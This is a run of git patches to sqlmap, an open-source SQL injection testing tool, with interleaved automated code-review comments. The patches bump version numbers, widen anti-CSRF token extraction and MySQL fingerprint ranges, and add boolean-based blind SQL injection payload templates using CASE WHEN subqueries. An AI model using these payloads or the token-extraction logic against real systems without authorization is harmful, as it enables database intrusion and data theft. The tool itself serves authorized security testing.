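Review bot: In lib/controller/checks.py the generic-403 marker `"You don't have permission to access"` is embedded inline in an already long condition; hoisting it into a named tuple in settings (a constructed name such as `GENERIC_403_MARKERS`) and testing `not any(_ in kb.wafSpecificResponse for _ in GENERIC_403_MARKERS)` keeps the list extensible and the condition readable. The check is an exact, case-sensitive substring match, so any other server-default 403 wording still produces a specific-response report; a comment stating that this only suppresses the one common phrase would make the limitation explicit. The surrounding function and the later use of `filename` lie outside the hunk.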
diff --git a/txt/checksum.md5 b/txt/checksum.md5 index affd4e154e4..497139b458a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -0d4c9c5936d0c063f4b08318f26ad5ca lib/controller/checks.py +c799e4aa5cf1ad50fab0c970885c61d9 lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1d4a4c8a47f7d7ce2b5fa59548e84bc5 lib/core/settings.py +423c57c6503bbbaa42fa832833381246 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py From 0c7eecee9f1b30287eefaaf5a7bb93b657ea867c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 16:52:17 +0200 Subject: [PATCH 288/428] Trivial update (message language) --- lib/controller/checks.py | 7 +++---- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 7 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f96a63f307c..e8d8b0f527a 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py 
@@ -1232,7 +1232,7 @@ def checkStability(): logger.error(errMsg) else: - warnMsg = "target URL content is not stable. sqlmap will base the page " + warnMsg = "target URL content is not stable (i.e. content differs). sqlmap will base the page " warnMsg += "comparison on a sequence matcher. If no dynamic nor " warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " @@ -1317,9 +1317,8 @@ def checkRegexp(): rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) if not re.search(conf.regexp, rawResponse, re.I | re.M): - warnMsg = "you provided '%s' as the regular expression to " % conf.regexp - warnMsg += "match, but such a regular expression does not have any " - warnMsg += "match within the target URL raw response, sqlmap " + warnMsg = "you provided '%s' as the regular expression " % conf.regexp + warnMsg += "which does not have any match within the target URL raw response. sqlmap " warnMsg += "will carry on anyway" logger.warn(warnMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 656274b857d..3cd18dd1d14 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.27" +VERSION = "1.2.9.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 497139b458a..09d93d8909f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -24,7 +24,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -c799e4aa5cf1ad50fab0c970885c61d9 lib/controller/checks.py +ba0f924d43ff1e41f070afb003ed0aaa lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -423c57c6503bbbaa42fa832833381246 lib/core/settings.py +29691989c16b3240427c4159a2db6129 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py From dd9bfd13f281a687538384b29bb94bf7d7ce53b9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 17:03:27 +0200 Subject: [PATCH 289/428] Trivial update --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3cd18dd1d14..4c7e8fc9104 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.28" +VERSION = "1.2.9.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index e04248de12d..591fc4f5357 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -56,7 +56,7 @@ def _orderByTest(cols): query = agent.suffixQuery(query, suffix=suffix, comment=comment) payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where) page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False) - return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None + return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed")) and not kb.heavilyDynamic and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None if _orderByTest(1 if lowerCount is None else lowerCount) and not _orderByTest(randomInt() if upperCount is None else upperCount + 1): infoMsg = "'ORDER BY' technique appears to be usable. " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 09d93d8909f..bb5d71dddab 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -29691989c16b3240427c4159a2db6129 lib/core/settings.py +c4de3786929e1e0fcf2a614a58679588 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
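Review bot: The rewritten `return` in `_orderByTest` chains `not any(...) and ... and comparison(...) or re.search(...) is not None` without parentheses, relying on `and` binding tighter than `or`; with the new `"order (by|clause)"` alternation folded into the same line it is several hundred characters long and the precedence is easy to misread. Splitting it into named parts makes the intent explicit: `errored = any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order (by|clause)", "unknown column", "failed"))` followed by `return (not errored and not kb.heavilyDynamic and comparison(page, headers, code)) or re.search(r"data types cannot be compared or sorted", page or "", re.I) is not None`. The rest of `_orderByTest` and its caller are outside the hunk.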
@@ -100,7 +100,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 6007347548e85383705eaa4b863448a2 lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py +f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py 77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 8abae02111f72517920a81b01d78158e68c0818b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 18 Sep 2018 22:05:52 +0200 Subject: [PATCH 290/428] Improvement of anti-CSRF token extraction --- lib/core/settings.py | 4 ++-- lib/parse/cmdline.py | 2 +- lib/request/connect.py | 16 ++++++++++++++-- txt/checksum.md5 | 6 +++--- 4 files changed, 20 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 4c7e8fc9104..83687a20410 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.29" +VERSION = "1.2.9.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -755,7 +755,7 @@ NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." # Infixes used for automatic recognition of parameters carrying anti-CSRF tokens -CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf") +CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token") # Prefixes used in brute force search for web server document root BRUTE_DOC_ROOT_PREFIXES = { diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 4570b9996f1..b6a46c0b3d4 100644 --- a/lib/parse/cmdline.py 
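Review bot: Adding `"token"` to `CSRF_TOKEN_PARAMETER_INFIXES` widens automatic anti-CSRF recognition far beyond csrf/xsrf: presumably any parameter whose name contains that infix (access_token, auth_token and the like) is now treated as an anti-CSRF candidate, and the comment above the tuple does not record that trade-off. Suggest extending it: `# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens (note: "token" deliberately also matches unrelated *_token parameters)`. How the infix list is consumed is outside this hunk, so the exact consequence should be confirmed against the caller.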
+++ b/lib/parse/cmdline.py @@ -207,7 +207,7 @@ def cmdLineParser(argv=None): help="Parameter used to hold anti-CSRF token") request.add_option("--csrf-url", dest="csrfUrl", - help="URL address to visit to extract anti-CSRF token") + help="URL address to visit for extraction of anti-CSRF token") request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS") diff --git a/lib/request/connect.py b/lib/request/connect.py index d114663b7c1..d15a2c4d814 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -948,15 +948,27 @@ def _adjustParameter(paramString, parameter, newValue):
 return retVal
 page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
- token = extractRegexResult(r"(?i)]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
+ token = extractRegexResult(r"(?i)]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P[^>'\"]*)" % re.escape(conf.csrfToken), page or "")
 if not token:
- token = extractRegexResult(r"(?i)]+\bvalue=(?P(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
+ token = extractRegexResult(r"(?i)]+\bvalue=[\"']?(?P[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "")
 if not token:
 match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
 token = match.group(1) if match else None
+ if not token:
+ token = extractRegexResult(r"\b%s\s*[:=]\s*(?P\w+)" % re.escape(conf.csrfToken), str(headers))
+
+ if not token:
+ token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P[^;'\"]+)" % re.escape(conf.csrfToken), page or "")
+
+ if token:
+ match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token)
+
+ if match:
+ token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(','))
+
 if not token:
 if conf.csrfUrl != conf.url and code == httplib.OK:
 if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index bb5d71dddab..460896a280d 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
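Review bot: The `String.fromCharCode` decoding on the last added lines can raise instead of falling through: the capture class `[\d+, ]+` admits `+`, so a piece such as `1+2` (or an empty piece left by a trailing comma) makes `int(_)` throw ValueError, and since the file still uses `httplib` this is Python 2, where `chr()` rejects code points above 255. Keeping only digit runs and using `unichr` avoids both, e.g. `token = "".join(unichr(int(_)) for _ in re.findall(r"\d+", match.group(1)))`. The new header fallback applies the token-name regex to `str(headers)`, which presumably matches the name anywhere in the serialized header block, cookie values included; a one-line comment stating that is intended would help. The enclosing function body starts outside the hunk.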
@@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4de3786929e1e0fcf2a614a58679588 lib/core/settings.py +64ae44f8e2b61c49354f3866ba40a926 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -61,7 +61,7 @@ b35636650cfe721f5cc47fb91737c061 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -fc5a42940327dd3f40a780c865b6b136 lib/parse/cmdline.py +134bbbf67bb30c188b8409c0b3bfbc2a lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -72,7 +72,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -b744d840de253c05e808a72d6d11dc5d lib/request/connect.py +35db2a1779b9c71dfa183ac1f8995a5b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From cd08d1364731ec01c3abb653264e23c1fa60b10f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 19 Sep 2018 11:05:55 +0200 Subject: [PATCH 291/428] Adding a generic parameter replace payload --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- xml/payloads/boolean_blind.xml | 106 ++++++++++++--------------------- 3 files changed, 41 insertions(+), 71 deletions(-) 
diff --git a/lib/core/settings.py b/lib/core/settings.py index 83687a20410..330b29f0aae 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.30" +VERSION = "1.2.9.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 460896a280d..13662fed68b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -64ae44f8e2b61c49354f3866ba40a926 lib/core/settings.py +fa8c27b009a20b604ce2959e7f7d0696 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -474,7 +474,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml +4db0392af190e27f9e2af56a3249c5cb xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 7b9e5b46ee1..ca09ca3c1af 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml 
@@ -203,6 +203,40 @@ Tag: + + AND boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + 1 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + OR boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + 1 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 @@ -566,83 +600,19 @@ Tag: - MySQL >= 5.0 boolean-based blind - Parameter replace + Boolean-based blind - Parameter replace (original value) 1 1 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL >= 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - >= 5.0 -
    -
    - - - MySQL < 5.0 boolean-based blind - Parameter replace - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) -
    - MySQL - < 5.0 -
    -
    - - - MySQL < 5.0 boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - < 5.0 -
    From 245c5e64e9552181bb6404876c5ed4bc47e73b82 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 19 Sep 2018 11:13:59 +0200 Subject: [PATCH 292/428] Minor cleanup --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/payloads/boolean_blind.xml | 16 ++++++++-------- 3 files changed, 11 insertions(+), 11 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 330b29f0aae..275c6c1c229 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.31" +VERSION = "1.2.9.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 13662fed68b..77df22df343 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fa8c27b009a20b604ce2959e7f7d0696 lib/core/settings.py +efef2534b513cac460d62a2709dad5b5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py 
@@ -474,7 +474,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -4db0392af190e27f9e2af56a3249c5cb xml/payloads/boolean_blind.xml +11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index ca09ca3c1af..efb9e5cdcbc 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -204,7 +204,7 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 1 @@ -221,7 +221,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + OR boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 3 @@ -238,7 +238,7 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (Generic comment) + AND boolean-based blind - WHERE or HAVING clause (comment) 1 2 1 @@ -255,7 +255,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (Generic comment) + OR boolean-based blind - WHERE or HAVING clause (comment) 1 2 3 @@ -272,7 +272,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT) + OR boolean-based blind - WHERE or HAVING clause (NOT - comment) 1 4 3 @@ -329,7 +329,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) + OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) 1 3 3 @@ -981,7 +981,7 @@ Tag: - Boolean-based blind - Parameter replace (DUAL) (original value) + Boolean-based blind - Parameter replace (DUAL - original value) 1 3 1 
@@ -1015,7 +1015,7 @@ Tag: - Boolean-based blind - Parameter replace (CASE) (original value) + Boolean-based blind - Parameter replace (CASE - original value) 1 3 1 From a4068f9abfd028e102499a5b31c6f2cd7e8e23e3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 20 Sep 2018 16:52:02 +0200 Subject: [PATCH 293/428] Minor update --- lib/core/settings.py | 2 +- plugins/dbms/mysql/fingerprint.py | 8 ++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 275c6c1c229..b2511829db0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.32" +VERSION = "1.2.9.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 89ea5c8ee09..092d97d3dcb 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -48,11 +48,11 @@ def _commentCheck(self): (50000, 50096), # MySQL 5.0 (50100, 50172), # MySQL 5.1 (50400, 50404), # MySQL 5.4 - (50500, 50558), # MySQL 5.5 - (50600, 50638), # MySQL 5.6 - (50700, 50720), # MySQL 5.7 + (50500, 50564), # MySQL 5.5 + (50600, 50644), # MySQL 5.6 + (50700, 50726), # MySQL 5.7 (60000, 60014), # MySQL 6.0 - (80000, 80003), # MySQL 8.0 + (80000, 80015), # MySQL 8.0 ) index = -1 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 77df22df343..7e54375c3fb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
